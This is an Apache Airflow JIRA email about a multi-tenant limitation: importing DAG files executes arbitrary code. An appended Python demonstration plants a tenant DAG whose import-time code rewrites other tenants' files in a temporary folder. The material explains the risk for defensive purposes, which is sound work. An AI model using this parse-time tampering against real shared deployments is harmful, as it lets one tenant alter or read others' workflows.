Posted to commits@airflow.apache.org by "Ash Berlin-Taylor (JIRA)" <ji...@apache.org> on 2018/09/06 09:37:00 UTC

[jira] [Updated] (AIRFLOW-2283) Explain multi-Tenant security limitations

     [ https://issues.apache.org/jira/browse/AIRFLOW-2283?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Ash Berlin-Taylor updated AIRFLOW-2283:
---------------------------------------
                 Flags:   (was: Important)
    Remaining Estimate:     (was: 168h)
     Original Estimate:     (was: 168h)
           Component/s:     (was: webserver)
                            (was: security)
                            (was: scheduler)
                            (was: models)
               Summary: Explain multi-Tenant security limitations  (was: Multi-Tenant security vulnerability)

> Explain multi-Tenant security limitations
> -----------------------------------------
>
>                 Key: AIRFLOW-2283
>                 URL: https://issues.apache.org/jira/browse/AIRFLOW-2283
>             Project: Apache Airflow
>          Issue Type: Bug
>    Affects Versions: 1.8.0
>         Environment: Any/All
>            Reporter: Garrett Summers
>            Priority: Major
>              Labels: security
>
> We noticed what we think to be a potential security vulnerability when importing dag files in the following line:
> {{m = imp.load_source(mod_name, filepath)}}
> This line in the DagBag.process_file code imports the dag files available, but this causes all of the code in the file to actually execute (which could be any arbitrary code). If the dags for different tenants are being stored in a common dag structure (even though they are filtered for the different tenants) then the arbitrary code execution would make it possible for one tenant to access/modify the dags of other tenants. This would be a major problem for users who utilize the multi-tenant functionality in Airflow.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)
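The mechanism the issue describes, shown as a self-contained added example (not Airflow code and not part of the JIRA thread): a shared dags folder with two tenant subdirectories is constructed in a temp directory, and tenant A's DAG file is imported the way DagBag.process_file imports files. Because the module body runs at import time, tenant A's file can read and rewrite tenant B's file without any DAG ever being scheduled. The example uses importlib.util in place of `imp.load_source`, since the `imp` module is deprecated and removed in Python 3.12; the effect (executing the whole file on import) is the same. The tenant names, file layout and the `load_dag_file`/`demo` helpers are assumptions made for the demonstration.

```python
# Added example: shows that importing a DAG file as DagBag.process_file does
# executes the file's top-level code. Not Airflow code. Uses importlib instead
# of the removed `imp.load_source`, which loaded a module from a path the same way.
import importlib.util
import os
import tempfile
import textwrap

# Constructed "tenant A" DAG file. Its module body (run at parse time, not when
# any task runs) walks the shared dags folder and appends to every other .py file.
MALICIOUS_DAG = textwrap.dedent('''\
    import pathlib
    # Parsing runs as the scheduler/webserver user, so this sees every file that
    # user can read, regardless of per-tenant filtering in the UI.
    ROOT = pathlib.Path(__file__).resolve().parents[1]   # the shared dags folder
    TOUCHED = []
    for path in sorted(ROOT.rglob("*.py")):
        if path == pathlib.Path(__file__).resolve():
            continue
        TOUCHED.append(path.relative_to(ROOT).as_posix())
        with open(path, "a") as fh:
            fh.write("\\n# modified by tenant_a at parse time\\n")
''')

# Constructed "tenant B" DAG file; its content is irrelevant, it is just a target.
BENIGN_DAG = "# tenant_b's DAG definition goes here\n"


def load_dag_file(filepath: str, mod_name: str):
    """Import a DAG file from an arbitrary path, as DagBag.process_file does.

    Stands in for the `m = imp.load_source(mod_name, filepath)` line quoted in
    the issue: the entire module body executes during this call.
    """
    spec = importlib.util.spec_from_file_location(mod_name, filepath)
    module = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(module)
    return module


def demo() -> dict:
    """Build a shared dags folder with two tenants, then parse tenant A's file."""
    root = tempfile.mkdtemp(prefix="dags_")
    a_dir = os.path.join(root, "tenant_a")
    b_dir = os.path.join(root, "tenant_b")
    os.makedirs(a_dir)
    os.makedirs(b_dir)
    a_file = os.path.join(a_dir, "dag.py")
    b_file = os.path.join(b_dir, "dag.py")
    with open(a_file, "w") as fh:
        fh.write(MALICIOUS_DAG)
    with open(b_file, "w") as fh:
        fh.write(BENIGN_DAG)

    with open(b_file) as fh:
        before = fh.read()
    module = load_dag_file(a_file, "tenant_a_dag")   # the DAG "parse" step
    with open(b_file) as fh:
        after = fh.read()

    return {
        "touched": module.TOUCHED,              # files tenant A's code reached
        "tenant_b_modified": before != after,   # True: parse-time write succeeded
        "tenant_b_contents": after,
    }


if __name__ == "__main__":
    print(demo())
```

The practical check this illustrates: any principal who can place a file in the dags folder gets code execution as the user that parses it, and any filtering applied later in the webserver does nothing to stop that. Separation between tenants therefore has to happen at the filesystem or process level (separate dags folders and parsing processes per tenant), not in the UI.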